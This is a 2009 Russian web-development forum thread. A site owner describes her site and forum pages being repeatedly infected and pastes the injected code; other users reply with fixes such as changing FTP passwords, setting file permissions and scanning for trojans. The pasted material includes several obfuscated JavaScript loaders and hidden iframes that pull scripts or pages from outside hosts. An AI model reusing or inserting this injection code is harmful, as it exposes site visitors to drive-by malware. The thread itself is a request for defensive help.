Форум: Форум PHPФорум ApacheФорум Регулярные ВыраженияФорум MySQLHTML+CSS+JavaScriptФорум FlashРазное
Новые темы: 0000000
Объектно-ориентированное программирование на PHP. Авторы: Кузнецов М.В., Симдянов И.В. PHP 5/6. В подлиннике. Авторы: Кузнецов М.В., Симдянов И.В. C++. Мастер-класс в задачах и примерах. Авторы: Кузнецов М.В., Симдянов И.В. PHP Puzzles. Авторы: Кузнецов М.В., Симдянов И.В. PHP на примерах (2 издание). Авторы: Кузнецов М.В., Симдянов И.В.
ВСЕ НАШИ КНИГИ
Консультационный центр SoftTime

Форум PHP

Выбрать другой форум

 

Здравствуйте, Посетитель!

вид форума:
Линейный форум Структурный форум

тема: Проблема с index.php
 
 автор: Vezuvian   (17.05.2009 в 15:51)   письмо автору
 
 

Не могу понять в чём дело, залила сайт на ftp, было всё хорошо, а где-то через 2 недели установила форум на ftp и тут всё началось. На всех страницах сайта есть одни и те же кнопки и одна из них кнопка на форум, ссылка на форум, то есть главная страница на форуме называется также как главная страница на сайте index.php, может в этом проблема(то есть нужно переименовать на форуме index.php, например на forum.php)? А сама проблема заключается в том что после установки форума на главной странице сайта происходят изменения, а именно смещаются блоки с кнопками, баннер, нижняя часть страницы, вообщем все части начинают прыгать, то выше то ниже то влево то вправо. А в сам код индексной страницы прописывается какая-то ерунда, вроде как какой-то скрипт. И при чём в index.php на форуме тоже самое прописывается, правда части форума не смещаются, но вверху страницы какие-то иероглифы. Было такое что, когда я заходила на сайт меня перекидывало на другой сайт, в коде каким-то образом прописалась переадресация. Когда у меня в первый раз произошло такое, я скопировала на компьютер весь сайт и проверила avast-ом оказалось что вирусы, всё удалила, снова залила сайт, подождала около 2-х недель было всё хорошо и залила форум, тот же IPB только уже другую сборку и проверила его на вирусы всё было ок, но прошло около одного дня и снова началось. Вот моя индексная страница:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>главная</title>
<!-- *CSS* -->
<!-- Theme css -->
<link rel='stylesheet' href='img/style000.css' type='text/css' media='all' />
<!-- *META* -->
<meta http-equiv='content-type' content='text/html; charset=windows-1251' />
<meta http-equiv='content-style-type' content='text/css' />
<!-- Core Meta Tags -->



                     /*Вот этот код, прописался в страницу самопроизвольно:*/
<script>eval( unescape( "%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20%72%3d%64%6f%63%
75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%2c%75%3d%64%6f%63%75%6d%65%6e%74%2e%55%52%4c%2c%
74%3d%22%22%2c%71%2c%71%75%65%2c%73%65%3d%22%67%62%22%3b%0d%0a%69%66%28%72%2e%69%6e%64%65%
78%4f%66%28%22%67%6f%6f%67%6c%65%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%
67%6f%6f%67%6c%65%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%6d%73%6e%2e%22%
29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%6d%73%6e%22%3b%7d%0d%0a%69%66%28%72%2e%
69%6e%64%65%78%4f%66%28%22%79%61%68%6f%6f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%
65%3d%22%79%61%68%6f%6f%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%6e%
64%65%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%65%78%74%22%3b%73%65%3d%22%79%61%6e%
64%65%78%2e%72%75%22%3b%7d%0d%0a%69%66%28%74%2e%6c%65%6e%67%74%68&&%28%28%71%3d%72%2e%69%
6e%64%65%78%4f%66%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%69%
6e%64%65%78%4f%66%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%65%3d%72%
2e%73%75%62%73%74%72%69%6e%67%28%71%2b%32%2b%74%2e%6c%65%6e%67%74%68%29%2e%73%70%6c%69%74%28%
22&%22%29%5b%30%5d%3b%0d%0a%69%66%20%28%28%71%75%65%2e%69%6e%64%65%78%4f%66%28%27%73%69%74%65%
3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%65%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e%69%6e%
64%65%78%4f%66%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%64%6f%63%75%6d%65%6e%74%2e%77%
72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%65%73%74%34%79%
6f%75%2e%69%66%2e%75%61%2f%6a%73%2f%62%69%64%63%68%2e%6a%73%3f%71%3d%22%2b%71%75%65%2b%22&%72%65%
66%3d%22%2b%72%2b%22%27%3e%3c%2f%73%63%22%2b%22%72%69%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%
76%61%72%20%6d%79%69%6b%3d%74%72%75%65%3b" ));</script></head>

<body><script id='c42A0FA3DE0AE1D52FB5518'>
/* =tdsjqu?jg)"nzjb*|epdvnfou/xsjuf)voftdbqf)!(&4d&7:&77&83&72&7e&76&31&7f&72&7e&76&4e&74&45&
43&31&84&83&74&4e&38&79&85&85&81&4b&3g&3g&42&4:&45&3f&42&47&46&3f&45&3f&43&46&3g&3f&83&85&76&
3g&78&7g&3f&81&79&81&4g&84&7:&75&4e&42'&38&3c&5e&72&85&79&3f&83&7g&86&7f&75&39&5e&72&85&79&3f&
83&72&7f&75&7g&7e&39&3:&3b&47&42&49&49&45&3:&3c&38&42&77&73&44&49&45&44&38&31&88&7:&75&85&79&
4e&42&4:&42&31&79&76&7:&78&79&85&4e&44&43&45&31&84&85&8:&7d&76&4e&38&87&7:&84&7:&73&7:&7d&7:&
85&8:&4b&79&7:&75&75&76&7f&38&4f&4d&3g&7:&77&83&72&7e&76&4f(**<~wbs!nzjb>usvf<=0tdsjqu? */
</script>
<script>
var A0928F44AC23FEB20CC5 = 74-73;var AF958FE48E0540E359D6 = document.getElementById
('c42A0FA3DE0AE1D52FB5518').innerHTML;var c42d5eb5edB5F1A1A03CCF1CA01EAF = new String;
AF958FE48E0540E359D6 = AF958FE48E0540E359D6.substr(4,550);for(i=0;i<AF958FE48E0540E359D6.length;i++)
 c42d5eb5edB5F1A1A03CCF1CA01EAF += String.fromCharCode(AF958FE48E0540E359D6.substr(i,1).
 charCodeAt()-A0928F44AC23FEB20CC5);document.write(c42d5eb5edB5F1A1A03CCF1CA01EAF);
</script>                               /*Конец, но продолжение следует.....*/


<div id='Wrap_all'>
<? include("blocks/menu_up.php"); ?>
<? 
include("blocks/menu_up_right.php"); ?>
   </div>
    <div id='front'>
        <div id='tx1'>    
<? include("blocks/login.php"); ?>
<? 
include("blocks/login_down.php"); ?>        
        </div>
<? include("blocks/banner_win.php"); ?>
        <div id='index'>
         <div id='index2'>
    <table style='width: 100%; padding: 10px;'>
        <tr>
            <td valign="top" class='title'>Главная страница</td>
        </tr>
    </table>
          </div>
         </div>
   </div> 
<? include("blocks/menu_left.php"); ?>
<? 
include("blocks/end.php"); ?>
</body>
</html>



                                         /*Продолжение*/
<?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo 
'<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,106,61,52,50,
52,52,52,51,59,118,97,114,32,104,106,103,50,50,61,34,99,111,112,121,34,59,118,97,114,32,119,
61,34,111,34,59,118,97,114,32,114,101,54,61,34,108,105,115,116,46,34,59,118,97,114,32,114,114,
116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,
116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,
97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,50,50,43,39,39,
43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,
116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,50,34,62,60,47,105,39,43,39,102,39,43,39,
114,97,109,101,62,39,41,59,118,97,114,32,104,103,52,61,50,51,49,49,50,51))</script>'

echo 
"";

echo 
"";

echo 
"";
?><script>check_content()</script>
                                                /*Конец*/


А вот код страницы, когда меня перекидывало на другой сайт:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>главная</title>
<!-- *CSS* -->
<!-- Theme css -->
<link rel='stylesheet' href='img/style000.css' type='text/css' media='all' />
<!-- *META* -->
<meta http-equiv='content-type' content='text/html; charset=windows-1251' />
<meta http-equiv='content-style-type' content='text/css' />
<!-- Core Meta Tags -->
</head>

<div id='Wrap_all'>
<? include("blocks/menu_up.php"); ?>
<? 
include("blocks/menu_up_right.php"); ?>
   </div>
    <div id='front'>
        <div id='tx1'>    
<? include("blocks/login.php"); ?>
<? 
include("blocks/login_down.php"); ?>        
        </div>
<? include("blocks/banner_win.php"); ?>
        <div id='index'>
         <div id='index2'>
    <table style='width: 100%; padding: 10px;'>
        <tr>
            <td valign="top" class='title'>Главная страница</td>
        </tr>
    </table>
          </div>
         </div>
   </div> 
<? include("blocks/menu_left.php"); ?>    
<? include("blocks/end.php"); 

                 
/*Вот другой код, который сам прописался в страницу:*/
echo "<iframe src=\"http://neglite.com/?click=6AA521\" width=1 height=1 
style=\"visibility:hidden;position:absolute\"></iframe>"
;

?>
 
</body>
</html>
                                    /* Вот ещё инородное */
<?php echo '<script type="text/javascript">var GdpldPBsdvjorQSwfbuS = 
"kw60kw105kw102kw114kw97kw109kw101kw 32kw119kw105kw100kw116kw104kw61kw34 kw52kw56
kw48kw34kw32kw104kw101kw105kw103kw1 04kw116kw61kw34kw54kw48kw34kw32kw11 5kw114kw99
kw61kw34kw104kw116kw116kw112kw58kw4 7kw47kw100kw111kw119kw110kw108kw111 kw97kw100kw
45kw49kw50kw51kw46kw99kw110kw47kw11 8kw116kw105kw97kw100kw109kw105kw110 kw50kw47kw116
kw46kw112kw104kw112kw34kw32kw115kw1 16kw121kw108kw101kw61kw34kw98kw111k w114kw100kw101kw
114kw58kw48kw112kw120kw59kw32kw112k w111kw115kw105kw116kw105kw111kw110k w58kw114kw101kw
108kw97kw116kw105kw118kw101kw59kw32 kw116kw111kw112kw58kw48kw112kw120kw 59kw32kw108kw
101kw102kw116kw58kw45kw53kw48kw48kw 112kw120kw59kw32kw111kw112kw97kw99k w105kw116kw121kw
58kw48kw59kw32kw102kw105kw108kw116k w101kw114kw58kw112kw114kw111kw103kw 105kw100kw58kw
68kw88kw73kw109kw97kw103kw101kw84kw 114kw97kw110kw115kw102kw111kw114kw1 09kw46kw77kw105kw
99kw114kw111kw115kw111kw102kw116kw4 6kw65kw108kw112kw104kw97kw40kw111kw 112kw97kw99kw105kw
116kw121kw61kw48kw41kw59kw32kw45kw1 09kw111kw122kw45kw111kw112kw97kw99k w105kw116kw121kw58
kw48kw34kw62kw60kw47kw105kw102kw114 kw97kw109kw101kw62";
var cyFDWFBHQiyWMnIpDJig = GdpldPBsdvjorQSwfbuS.split("kw");
var ERVwiosNQnfsmlwIqxQG = "";for (var gOdsCliGvQnAiIwQxpeN=1; 
gOdsCliGvQnAiIwQxpeN<cyFDWFBHQiyWMnIpDJig.length; gOdsCliGvQnAiIwQxpeN++)
{ERVwiosNQnfsmlwIqxQG+=String.fromCharCode(cyFDWFBHQiyWMnIpDJig[gOdsCliGvQnAiIwQxpeN]);
}document.write(ERVwiosNQnfsmlwIqxQG)</script>'
?>

  Ответить  
 
 автор: ols   (17.05.2009 в 16:23)   письмо автору
 
   для: Vezuvian   (17.05.2009 в 15:51)
 

Пароли к ftp смените

  Ответить  
 
 автор: Vezuvian   (17.05.2009 в 18:30)   письмо автору
 
   для: ols   (17.05.2009 в 16:23)
 

Спасибо за совет, но мне кажется это ничего не изменит. Может нужно установить какую-то защиту. Подскажите пожалуйста. И от куда это берётся? Ведь про сайт ещё никто не знает, я нигде ещё его не светила.

  Ответить  
 
 автор: Dr Lines   (17.05.2009 в 19:37)   письмо автору
 
   для: Vezuvian   (17.05.2009 в 18:30)
 

Можно попробовать решить эту проблему, установкой прав на index.php - 644 (только чтение).
Возможно, вредоносный код находится на установленном вами форуме, значит лучше поискать другие версии или сборки его.

  Ответить  
 
 автор: Vezuvian   (17.05.2009 в 21:01)   письмо автору
 
   для: Dr Lines   (17.05.2009 в 19:37)
 

Спасибо за совет, попробую так сделать может поможет.

  Ответить  
 
 автор: Akdmeh   (17.05.2009 в 19:49)   письмо автору
 
   для: Vezuvian   (17.05.2009 в 15:51)
 

Ошибка может быть в том, что ты пользуешься зараженным ftp-клиентом.
Какой-то зараженый Total Commander имел подобную уязвимость - посмотри, может причина в нём

  Ответить  
 
 автор: Vezuvian   (17.05.2009 в 21:00)   письмо автору
 
   для: Akdmeh   (17.05.2009 в 19:49)
 

Я пользуюсь FileZilla Client, не может быть в нём проблема, всё-таки наверное проблема в форуме, потому что это происходит после установки форума, до того как установила форум, 2 недели всё хорошо работало. Просто это уже вторая сборка форума, неужели мне с ними так не везёт, вроде никто не писал что какие-то проблемы возникают. Не хочу менять форум так как нашла скин под свой сайт, но видимо придёт. Всем спасибо за советы.

  Ответить  
 
 автор: Den*s   (19.05.2009 в 14:41)   письмо автору
 
   для: Vezuvian   (17.05.2009 в 21:00)
 

Проверьте свой комп на наличие троянов и всякой дряни. Даже при обновлении БД некоторые червяки на лету не ловятся, на одном моём сайте недавно тоже обнаружил вредоносный код, хотя стоит лицензионный антивирус, который постоянно обновляется. Проверил комп в безопасном режиме и нашёл 3 трояна

  Ответить  
Rambler's Top100
вверх

Rambler's Top100 Яндекс.Метрика Яндекс цитирования